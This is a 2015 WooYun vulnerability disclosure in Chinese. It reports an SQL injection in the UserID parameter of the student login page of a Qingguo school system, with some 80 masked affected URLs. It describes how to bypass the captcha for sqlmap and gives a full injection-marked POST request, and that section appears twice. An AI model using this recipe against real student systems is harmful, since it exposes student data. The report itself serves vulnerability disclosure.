乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-09-07: 细节向核心白帽子及相关领域专家公开 2015-09-17: 细节向普通白帽子公开 2015-09-27: 细节向实习白帽子公开 2015-10-12: 细节向公众公开
这么严重的SQL注射;青果会来确认吗?
青果某系统存在无限制SQL注射;居然没有见到传说中的WAF拦截;并且大部分可以使用SQLMAP自动化注入测试工具进行测试;并且均为DBA权限;危害极大!SQL Injection:
/_data/index_LOGIN.aspx 学生登录时UserID参数存在SQL注射漏洞
Case: 99%以上都是存在该漏洞;我想我该Mask一下保护这些学生!审核员你说呢?
1.http://**.**.**/_data/index_LOGIN.aspx_2.http://**.**.**/xsweb//_data/index_LOGIN.aspx_3.http://**.**.**//_data/index_LOGIN.aspx_4.http://**.**.**/xsweb/_data/index_LOGIN.aspx_5.http://**.**.**/xsweb/_data/index_LOGIN.aspx_6.http://**.**.**/xsweb/_data/index_LOGIN.aspx_7.http://**.**.**/xsweb/_data/index_LOGIN.aspx_8.http://**.**.**/xsweb/_data/index_LOGIN.aspx_9.http://**.**.**/xsweb//_data/index_LOGIN.aspx_10.http://**.**.**/xsweb//_data/index_LOGIN.aspx_11.http://**.**.**/xsweb//_data/index_LOGIN.aspx_12.http://**.**.**/xsweb//_data/index_LOGIN.aspx_13.http://**.**.**/xsweb//_data/index_LOGIN.aspx_14.http://**.**.**/xsweb/_data/index_LOGIN.aspx_15.http://**.**.**/xsweb//_data/index_LOGIN.aspx_16.http://**.**.**/xsweb//_data/index_LOGIN.aspx_17.http://**.**.**/xsweb//_data/index_LOGIN.aspx_18.http://**.**.**/_data/index_LOGIN.aspx_19.http://**.**.**/xsweb//_data/index_LOGIN.aspx_20.http://**.**.**/xsweb//_data/index_LOGIN.aspx_21.http://**.**.**/xsweb//_data/index_LOGIN.aspx_22.http://**.**.**/xsweb//_data/index_LOGIN.aspx_23.http://**.**.**/xsweb//_data/index_LOGIN.aspx_24.http://**.**.**/_data/index_LOGIN.aspx_25.http://**.**.**/xsweb//_data/index_LOGIN.aspx_26.http://**.**.**/xsweb//_data/index_LOGIN.aspx_27.http://**.**.**/xsweb//_data/index_LOGIN.aspx_28.http://**.**.**/xsweb/(ratfv3201hlusmzcsyjkwn45)/_data/index_LOGIN.aspx_29.http://**.**.**/xsweb//_data/index_LOGIN.aspx_30.http://**.**.**/XSWEB//_data/index_LOGIN.aspx_31.http://**.**.**/xsweb//_data/index_LOGIN.aspx_32.http://**.**.**/xsweb//_data/index_LOGIN.aspx_33.http://**.**.**/xsweb//_data/index_LOGIN.aspx_34.http://**.**.**/xsweb//_data/index_LOGIN.aspx_35.http://**.**.**/_data/index_LOGIN.aspx_36.http://**.**.**/xsweb//_data/index_LOGIN.aspx_37.http://**.**.**/xsweb//_data/index_LOGIN.aspx_38.http://**.**.**/_data/index_LOGIN.aspx_39.http://**.**.**/_data/index_LOGIN.aspx_40.http://**.**.**/xsweb//_data/index_LOGIN.aspx_41.http://**.**.**/xsweb//_data/index_LOGIN.aspx_42.http://**.**.**/Xsweb//_data/index_LOGIN.aspx_43.http://**.**.**/_data/index_LOGIN.aspx_44.http://**.**.**/bzzyxs//_data/index_LOGIN.aspx_45.http://**.**.**/xsweb//_data/index_LOGIN.aspx_46.http://**.**.**/xsweb//_data/index_LOGIN.aspx_47.http://**.**.**/_data/index_LOGIN.aspx_48.http://**.**.**/xsweb//_data/index_LOGIN.aspx_49.http://**.**.**/xsweb//_data/index_LOGIN.aspx_50.http://**.**.**/xsweb//_data/index_LOGIN.aspx_51.http://**.**.**/_data/index_LOGIN.aspx_52.http://**.**.**/xsweb//_data/index_LOGIN.aspx_53.http://**.**.**/xsweb//_data/index_LOGIN.aspx_54.http://**.**.**/xsweb//_data/index_LOGIN.aspx_55.http://**.**.**/_data/index_LOGIN.aspx_56.http://**.**.**/_data/index_LOGIN.aspx_57.http://**.**.**/xsweb//_data/index_LOGIN.aspx_58.http://**.**.**/xsweb//_data/index_LOGIN.aspx_59.http://**.**.**/XSWEB//_data/index_LOGIN.aspx_60.http://**.**.**/xsweb//_data/index_LOGIN.aspx_61.http://**.**.**/xsweb//_data/index_LOGIN.aspx_62.http://**.**.**/xsweb//_data/index_LOGIN.aspx_63.http://**.**.**/xsweb//_data/index_LOGIN.aspx_64.http://**.**.**/_data/index_LOGIN.aspx_65.http://**.**.**/xsweb//_data/index_LOGIN.aspx_66.http://**.**.**//_data/index_LOGIN.aspx_67.http://**.**.**/xsweb//_data/index_LOGIN.aspx_68.http://**.**.**/_data/index_LOGIN.aspx_69.http://**.**.**/xsweb//_data/index_LOGIN.aspx_70.http://**.**.**/xsweb//_data/index_LOGIN.aspx_71.http://**.**.**/xsweb/_data/index_LOGIN.aspx_72.http://**.**.**/xsweb/_data/index_LOGIN.aspx_73.http://**.**.**//_data/index_LOGIN.aspx_74.http://**.**.**/_data/index_LOGIN.aspx_75.http://**.**.**/xsweb//_data/index_LOGIN.aspx_76.http://**.**.**/xsweb//_data/index_LOGIN.aspx_77.http://**.**.**//_data/index_LOGIN.aspx_78.http://**.**.**///_data/index_LOGIN.aspx_79.http://**.**.**/xsweb///_data/index_LOGIN.aspx_80.http://**.**.**/xsweb//_data/index_LOGIN.aspx
Security Testing
手工1、 2、SQLMAP自动化测试;使用SQLMAP自动化测试的方法就在于验证码会随机变换;经过测试在抓包获取POST提交数据后将CheckCode改为下一个验证码;注射参数后面*号标志即可绕过无限制SQL注射!POST /xsweb/_data/index_LOGIN.aspx HTTP/1.1Host: ***.**.***.**Proxy-Connection: keep-aliveContent-Length: 141Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://***.**.***.*User-Agent: **********************Content-Type: application/x-www-form-urlencodedReferer: http://***.**.***.*/xsweb/_data/index_LOGIN.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=rvmviarpqq0i3b3eemf5xmae__VIEWSTATE=dDwtMTc5NzIxMDUzMDs7PlnVMA1CpUQ5r4Nrg5HDOU7eG%2BMh&pcInfo=&typeName=&Sel_Type=STU&UserID=aaa*&PassWord=aaaaa&random=新的验证码&sbtState=
2、SQLMAP自动化测试;使用SQLMAP自动化测试的方法就在于验证码会随机变换;经过测试在抓包获取POST提交数据后将CheckCode改为下一个验证码;注射参数后面*号标志即可绕过无限制SQL注射!POST /xsweb/_data/index_LOGIN.aspx HTTP/1.1Host: ***.**.***.**Proxy-Connection: keep-aliveContent-Length: 141Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://***.**.***.*User-Agent: **********************Content-Type: application/x-www-form-urlencodedReferer: http://***.**.***.*/xsweb/_data/index_LOGIN.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=rvmviarpqq0i3b3eemf5xmae__VIEWSTATE=dDwtMTc5NzIxMDUzMDs7PlnVMA1CpUQ5r4Nrg5HDOU7eG%2BMh&pcInfo=&typeName=&Sel_Type=STU&UserID=aaa*&PassWord=aaaaa&random=新的验证码&sbtState=
危害等级:无影响厂商忽略
忽略时间:2015-10-12 10:47
漏洞Rank:15 (WooYun评价)
暂无